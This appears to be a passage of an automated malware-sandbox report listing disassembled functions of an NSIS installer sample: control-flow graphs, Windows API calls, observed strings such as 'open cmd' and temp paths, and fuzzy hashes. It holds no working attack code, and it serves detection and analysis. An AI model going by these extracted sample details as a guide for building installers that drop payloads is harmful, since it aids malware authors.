                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3282139019-0
                                                                                                                                                                                                                                  • Opcode ID: 0b7f36f750eebe6e1f161721f6fbfdbf0deb52ea427a9cf17ec2d27919205841
                                                                                                                                                                                                                                  • Instruction ID: 0a9eb52b79e7a1f6ac08be675ff74ca1e342e547d7f0445f300758720cde36e9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0b7f36f750eebe6e1f161721f6fbfdbf0deb52ea427a9cf17ec2d27919205841
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0EC1D0B1600305EBDB216F62ED88D2A3A78FB95745F51053EFA42B11F0CB794852DB2D
                                                                                                                                                                                                                                  Function 00403AAA Relevance: 44.0, APIs: 14, Strings: 11, Instructions: 215stringregistryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 293 403aaa-403ac2 call 4067d0 296 403ac4-403acf GetUserDefaultUILanguage call 406322 293->296 297 403ad6-403b0d call 4062a9 293->297 301 403ad4 296->301 302 403b25-403b2b lstrcatW 297->302 303 403b0f-403b20 call 4062a9 297->303 304 403b30-403b59 call 403d80 call 405db8 301->304 302->304 303->302 310 403beb-403bf3 call 405db8 304->310 311 403b5f-403b64 304->311 317 403c01-403c26 LoadImageW 310->317 318 403bf5-403bfc call 406418 310->318 311->310 312 403b6a-403b92 call 4062a9 311->312 312->310 322 403b94-403b98 312->322 320 403ca7-403caf call 40140b 317->320 321 403c28-403c58 RegisterClassW 317->321 318->317 335 403cb1-403cb4 320->335 336 403cb9-403cc4 call 403d80 320->336 323 403d76 321->323 324 403c5e-403ca2 SystemParametersInfoW CreateWindowExW 321->324 326 403baa-403bb6 lstrlenW 322->326 327 403b9a-403ba7 call 405cdd 322->327 329 403d78-403d7f 323->329 324->320 330 403bb8-403bc6 lstrcmpiW 326->330 331 403bde-403be6 call 405cb0 call 4063db 326->331 327->326 330->331 334 403bc8-403bd2 GetFileAttributesW 330->334 331->310 338 403bd4-403bd6 334->338 339 403bd8-403bd9 call 405cfc 334->339 335->329 345 403cca-403ce4 ShowWindow call 406760 336->345 346 403d4d-403d4e call 405516 336->346 338->331 338->339 339->331 353 403cf0-403d02 GetClassInfoW 345->353 354 403ce6-403ceb call 406760 345->354 349 403d53-403d55 346->349 351 403d57-403d5d 349->351 352 403d6f-403d71 call 40140b 349->352 351->335 357 403d63-403d6a call 40140b 351->357 352->323 355 403d04-403d14 GetClassInfoW RegisterClassW 353->355 356 403d1a-403d3d DialogBoxParamW call 40140b 353->356 354->353 355->356 362 403d42-403d4b call 4039fa 356->362 357->335 362->329
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 004067D0: GetModuleHandleA.KERNEL32(?,00000020,?,00403501,0000000B), ref: 004067E2
                                                                                                                                                                                                                                    • Part of subcall function 004067D0: GetProcAddress.KERNEL32(00000000,?), ref: 004067FD
                                                                                                                                                                                                                                  • GetUserDefaultUILanguage.KERNELBASE(00000002,74DF3420,C:\Users\user\AppData\Local\Temp\,00435000,00000000), ref: 00403AC4
                                                                                                                                                                                                                                    • Part of subcall function 00406322: wsprintfW.USER32 ref: 0040632F
                                                                                                                                                                                                                                  • lstrcatW.KERNEL32(1033,00423708), ref: 00403B2B
                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,00435800,1033,00423708,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423708,00000000,00000002,74DF3420), ref: 00403BAB
                                                                                                                                                                                                                                  • lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,00435800,1033,00423708,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423708,00000000), ref: 00403BBE
                                                                                                                                                                                                                                  • GetFileAttributesW.KERNEL32(: Completed), ref: 00403BC9
                                                                                                                                                                                                                                  • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,00435800), ref: 00403C12
                                                                                                                                                                                                                                  • RegisterClassW.USER32(004291C0), ref: 00403C4F
                                                                                                                                                                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C67
                                                                                                                                                                                                                                  • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403C9C
                                                                                                                                                                                                                                  • ShowWindow.USER32(00000005,00000000), ref: 00403CD2
                                                                                                                                                                                                                                  • GetClassInfoW.USER32(00000000,RichEdit20W,004291C0), ref: 00403CFE
                                                                                                                                                                                                                                  • GetClassInfoW.USER32(00000000,RichEdit,004291C0), ref: 00403D0B
                                                                                                                                                                                                                                  • RegisterClassW.USER32(004291C0), ref: 00403D14
                                                                                                                                                                                                                                  • DialogBoxParamW.USER32(?,00000000,00403E58,00000000), ref: 00403D33
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                                  • String ID: .DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                                                                                                                                  • API String ID: 606308-572083776
                                                                                                                                                                                                                                  • Opcode ID: f45dbe301eae32004318a3f9e680f07a8516310e0cd2211a6b62600ea06e2d0b
                                                                                                                                                                                                                                  • Instruction ID: a24d2e849b10ad8e1ed533e9d37a820f5d0e6b510d4fa7617ff35d8301a60578
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f45dbe301eae32004318a3f9e680f07a8516310e0cd2211a6b62600ea06e2d0b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E761B670244600BAD720AF669D45E2B3A7CEB84B0AF40457FFD41B62E2DB7D5912CA2D
                                                                                                                                                                                                                                  Function 00403015 Relevance: 21.2, APIs: 5, Strings: 7, Instructions: 181memoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 366 403015-403063 GetTickCount GetModuleFileNameW call 405ed1 369 403065-40306a 366->369 370 40306f-40309d call 4063db call 405cfc call 4063db GetFileSize 366->370 372 403245-403249 369->372 378 4030a3 370->378 379 403188-403196 call 402fb1 370->379 381 4030a8-4030bf 378->381 385 403198-40319b 379->385 386 4031eb-4031f0 379->386 383 4030c1 381->383 384 4030c3-4030cc call 403431 381->384 383->384 392 4031f2-4031fa call 402fb1 384->392 393 4030d2-4030d9 384->393 388 40319d-4031b5 call 403447 call 403431 385->388 389 4031bf-4031e9 GlobalAlloc call 403447 call 40324c 385->389 386->372 388->386 415 4031b7-4031bd 388->415 389->386 413 4031fc-40320d 389->413 392->386 397 403155-403159 393->397 398 4030db-4030ef call 405e8c 393->398 403 403163-403169 397->403 404 40315b-403162 call 402fb1 397->404 398->403 412 4030f1-4030f8 398->412 409 403178-403180 403->409 410 40316b-403175 call 4068bd 403->410 404->403 409->381 414 403186 409->414 410->409 412->403 419 4030fa-403101 412->419 420 403215-40321a 413->420 421 40320f 413->421 414->379 415->386 415->389 419->403 422 403103-40310a 419->422 423 40321b-403221 420->423 421->420 422->403 424 40310c-403113 422->424 423->423 425 403223-40323e SetFilePointer call 405e8c 423->425 424->403 426 403115-403135 424->426 429 403243 425->429 426->386 428 40313b-40313f 426->428 430 403141-403145 428->430 431 403147-40314f 428->431 429->372 430->414 430->431 431->403 432 403151-403153 431->432 432->403
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 00403026
                                                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,00438800,00000400,?,00000007,00000009,0000000B), ref: 00403042
                                                                                                                                                                                                                                    • Part of subcall function 00405ED1: GetFileAttributesW.KERNELBASE(00438800,00403055,00438800,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405ED5
                                                                                                                                                                                                                                    • Part of subcall function 00405ED1: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000007,00000009,0000000B), ref: 00405EF7
                                                                                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,00438800,00438800,80000000,00000003,?,00000007,00000009,0000000B), ref: 0040308E
                                                                                                                                                                                                                                  • GlobalAlloc.KERNELBASE(00000040,0000000B,?,00000007,00000009,0000000B), ref: 004031C4
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                                                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                                                                                                                  • API String ID: 2803837635-2162933095
                                                                                                                                                                                                                                  • Opcode ID: 286758f993afdfee37dc791dabadca02854f419a97292f6ff8ee6bd162e70e0f
                                                                                                                                                                                                                                  • Instruction ID: a1180c22f2f56a455fdba696775536d8b2bad2e91b267b1d20a8a943b96b17b0
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 286758f993afdfee37dc791dabadca02854f419a97292f6ff8ee6bd162e70e0f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DD51E571904204ABDB209F64DD81B9E7EACEB05316F20407BF905BA3D1C77D8E81876D
                                                                                                                                                                                                                                  Function 00406418 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 209stringCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 433 406418-406423 434 406425-406434 433->434 435 406436-40644c 433->435 434->435 436 406452-40645f 435->436 437 406664-40666a 435->437 436->437 440 406465-40646c 436->440 438 406670-40667b 437->438 439 406471-40647e 437->439 441 406686-406687 438->441 442 40667d-406681 call 4063db 438->442 439->438 443 406484-406490 439->443 440->437 442->441 445 406651 443->445 446 406496-4064d4 443->446 449 406653-40665d 445->449 450 40665f-406662 445->450 447 4065f4-4065f8 446->447 448 4064da-4064e5 446->448 453 4065fa-406600 447->453 454 40662b-40662f 447->454 451 4064e7-4064ec 448->451 452 4064fe 448->452 449->437 450->437 451->452 455 4064ee-4064f1 451->455 458 406505-40650c 452->458 456 406610-40661c call 4063db 453->456 457 406602-40660e call 406322 453->457 459 406631-406639 call 406418 454->459 460 40663e-40664f lstrlenW 454->460 455->452 461 4064f3-4064f6 455->461 471 406621-406627 456->471 457->471 463 406511-406513 458->463 464 40650e-406510 458->464 459->460 460->437 461->452 467 4064f8-4064fc 461->467 469 406515-40653c call 4062a9 463->469 470 40654e-406551 463->470 464->463 467->458 483 406542-406549 call 406418 469->483 484 4065dc-4065df 469->484 472 406561-406564 470->472 473 406553-40655f GetSystemDirectoryW 470->473 471->460 475 406629 471->475 477 406566-406574 GetWindowsDirectoryW 472->477 478 4065cf-4065d1 472->478 476 4065d3-4065d7 473->476 480 4065ec-4065f2 call 40668a 475->480 476->480 485 4065d9 476->485 477->478 478->476 482 406576-406580 478->482 480->460 487 406582-406585 482->487 488 40659a-4065b0 SHGetSpecialFolderLocation 482->488 483->476 484->480 490 4065e1-4065e7 lstrcatW 484->490 485->484 487->488 491 406587-40658e 487->491 492 4065b2-4065c9 SHGetPathFromIDListW CoTaskMemFree 488->492 493 4065cb 488->493 490->480 495 406596-406598 491->495 492->476 492->493 493->478 495->476 495->488
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 00406559
                                                                                                                                                                                                                                  • GetWindowsDirectoryW.KERNEL32(: Completed,00000400,00000000,004226E8,?,0040547A,004226E8,00000000), ref: 0040656C
                                                                                                                                                                                                                                  • SHGetSpecialFolderLocation.SHELL32(0040547A,00418EC0,00000000,004226E8,?,0040547A,004226E8,00000000), ref: 004065A8
                                                                                                                                                                                                                                  • SHGetPathFromIDListW.SHELL32(00418EC0,: Completed), ref: 004065B6
                                                                                                                                                                                                                                  • CoTaskMemFree.OLE32(00418EC0), ref: 004065C1
                                                                                                                                                                                                                                  • lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 004065E7
                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(: Completed,00000000,004226E8,?,0040547A,004226E8,00000000), ref: 0040663F
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                                                                                                                                                                  • String ID: : Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                                                                                  • API String ID: 717251189-2549942501
                                                                                                                                                                                                                                  • Opcode ID: cf374de42321b31fcab9823a1dcbef99d7930476f55158ac4637f493945dcad9
                                                                                                                                                                                                                                  • Instruction ID: 14d1193dfffb306d7d50c4759d5107437c4365ff0453e231a2932b6079d00088
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cf374de42321b31fcab9823a1dcbef99d7930476f55158ac4637f493945dcad9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 27612771A00111ABDF209F24ED40ABE37A5AF54314F12813FE943B62D0DB3E89A2CB5D
                                                                                                                                                                                                                                  Function 0040176F Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145stringtimeCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 496 40176f-401794 call 402d3e call 405d27 501 401796-40179c call 4063db 496->501 502 40179e-4017b0 call 4063db call 405cb0 lstrcatW 496->502 507 4017b5-4017b6 call 40668a 501->507 502->507 511 4017bb-4017bf 507->511 512 4017c1-4017cb call 406739 511->512 513 4017f2-4017f5 511->513 521 4017dd-4017ef 512->521 522 4017cd-4017db CompareFileTime 512->522 514 4017f7-4017f8 call 405eac 513->514 515 4017fd-401819 call 405ed1 513->515 514->515 523 40181b-40181e 515->523 524 40188d-4018b6 call 405443 call 40324c 515->524 521->513 522->521 525 401820-40185e call 4063db * 2 call 406418 call 4063db call 405a41 523->525 526 40186f-401879 call 405443 523->526 538 4018b8-4018bc 524->538 539 4018be-4018ca SetFileTime 524->539 525->511 558 401864-401865 525->558 536 401882-401888 526->536 541 402bcb 536->541 538->539 540 4018d0-4018db FindCloseChangeNotification 538->540 539->540 544 4018e1-4018e4 540->544 545 402bc2-402bc5 540->545 543 402bcd-402bd1 541->543 547 4018e6-4018f7 call 406418 lstrcatW 544->547 548 4018f9-4018fc call 406418 544->548 545->541 555 401901-40239a call 405a41 547->555 548->555 555->543 555->545 558->536 560 401867-401868 558->560 560->526
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                                                                                                                                                                                                                                  • CompareFileTime.KERNEL32(-00000014,?,open,open,00000000,00000000,open,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache,?,?,00000031), ref: 004017D5
                                                                                                                                                                                                                                    • Part of subcall function 004063DB: lstrcpynW.KERNEL32(?,?,00000400,00403560,00429220,NSIS Error,?,00000007,00000009,0000000B), ref: 004063E8
                                                                                                                                                                                                                                    • Part of subcall function 00405443: lstrlenW.KERNEL32(004226E8,00000000,00418EC0,004031E6,?,?,?,?,?,?,?,?,?,00403385,00000000,?), ref: 0040547B
                                                                                                                                                                                                                                    • Part of subcall function 00405443: lstrlenW.KERNEL32(00403385,004226E8,00000000,00418EC0,004031E6,?,?,?,?,?,?,?,?,?,00403385,00000000), ref: 0040548B
                                                                                                                                                                                                                                    • Part of subcall function 00405443: lstrcatW.KERNEL32(004226E8,00403385), ref: 0040549E
                                                                                                                                                                                                                                    • Part of subcall function 00405443: SetWindowTextW.USER32(004226E8,004226E8), ref: 004054B0
                                                                                                                                                                                                                                    • Part of subcall function 00405443: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054D6
                                                                                                                                                                                                                                    • Part of subcall function 00405443: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054F0
                                                                                                                                                                                                                                    • Part of subcall function 00405443: SendMessageW.USER32(?,00001013,?,00000000), ref: 004054FE
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                                                                                                                  • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache$open$open cmd
                                                                                                                                                                                                                                  • API String ID: 1941528284-1391832873
                                                                                                                                                                                                                                  • Opcode ID: b59029357335a8af3f4a86e42d3be2ad60be171f7d8ba297da0cbaafdbd0df24
                                                                                                                                                                                                                                  • Instruction ID: 099db37703b38b7faa9c4b3761aa4ffcdc8a6de3d1088dc1ecc91c4b2867a8b7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b59029357335a8af3f4a86e42d3be2ad60be171f7d8ba297da0cbaafdbd0df24
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BB41C171500118BACB10BFA5DC85DAE7A79EF41328F20423FF822B10E1C77C8A519A6E
                                                                                                                                                                                                                                  Function 00405443 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 562 405443-405458 563 40545e-40546f 562->563 564 40550f-405513 562->564 565 405471-405475 call 406418 563->565 566 40547a-405486 lstrlenW 563->566 565->566 568 4054a3-4054a7 566->568 569 405488-405498 lstrlenW 566->569 571 4054b6-4054ba 568->571 572 4054a9-4054b0 SetWindowTextW 568->572 569->564 570 40549a-40549e lstrcatW 569->570 570->568 573 405500-405502 571->573 574 4054bc-4054fe SendMessageW * 3 571->574 572->571 573->564 575 405504-405507 573->575 574->573 575->564
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(004226E8,00000000,00418EC0,004031E6,?,?,?,?,?,?,?,?,?,00403385,00000000,?), ref: 0040547B
                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(00403385,004226E8,00000000,00418EC0,004031E6,?,?,?,?,?,?,?,?,?,00403385,00000000), ref: 0040548B
                                                                                                                                                                                                                                  • lstrcatW.KERNEL32(004226E8,00403385), ref: 0040549E
                                                                                                                                                                                                                                  • SetWindowTextW.USER32(004226E8,004226E8), ref: 004054B0
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054D6
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054F0
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001013,?,00000000), ref: 004054FE
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
